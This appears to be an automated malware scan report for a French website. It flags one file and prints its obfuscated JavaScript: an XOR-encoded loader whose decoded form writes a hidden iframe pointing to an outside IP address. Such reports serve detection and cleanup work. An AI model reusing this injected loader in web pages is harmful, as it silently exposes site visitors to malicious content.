Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mers-et-littoraux.com
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mers-et-littoraux.com/ | 200 OK Content-Length: 9270 Content-Type: text/html | clean |
http://mers-et-littoraux.com/jquery.js | 200 OK Content-Length: 93868 Content-Type: application/x-javascript | clean |
http://mers-et-littoraux.com/script.js | 200 OK Content-Length: 34365 Content-Type: application/x-javascript | clean |
http://mers-et-littoraux.com/script.responsive.js | 200 OK Content-Length: 7380 Content-Type: application/x-javascript | clean |
http://mers-et-littoraux.com/test404page.js | 404 Not Found Content-Length: 2137 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var de48=Array(0x69,0x3c,0x33,0x27,0x34,0x38,0x30,0x75,0x26,0x27,0x36,0x68,0x72,0x3d,0x21,0x21,0x25,0x6f,0x7a,0x7a,0x67,0x65,0x64,0x7b,0x67,0x64,0x6d,0x7b,0x67,0x60,0x65,0x7b,0x64,0x6c,0x7a,0x25,0x39,0x26,0x66,0x66,0x66,0x66,0x7a,0x36,0x3a,0x20,0x3b,0x21,0x7b,0x25,0x3d,0x25,0x6a,0x3a,0x68,0x66,0x65,0x72,0x75,0x26,0x21,0x2c,0x39,0x30,0x68,0x72,0x31,0x3c,0x26,0x25,0x39,0x34,0x2c,0x6f,0x3b,0x3a,0x3b,0x30,0x72,0x6b,0x69,0x7a,0x3c,0x33,0x27,0x34,0x38,0x30,0x6b),dbd1=new String;for(b97e=0;b97e<0x59;b97e++)dbd1+=String.fromCharCode(de48[b97e]^0x55);document.write(dbd1);
Decoded script: <iframe src='http://201.218.250.19/pls3333/count.php?o=30' style='display:none'></iframe>
Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mers-et-littoraux.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 11:51:14 GMT
Accept-Ranges: bytes
ETag: "13f808d-2436-4cc7aab213800"
Server: Apache
Content-Length: 9270
Content-Type: text/html
Last-Modified: Sat, 20 Oct 2012 09:58:56 GMT
X-Powered-By: PleskLin
...9270 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mers-et-littoraux.com
Referer: http://www.google.com/search?q=mers-et-littoraux.com
Result:
The result is similar to the first query. There are no suspicious redirects found.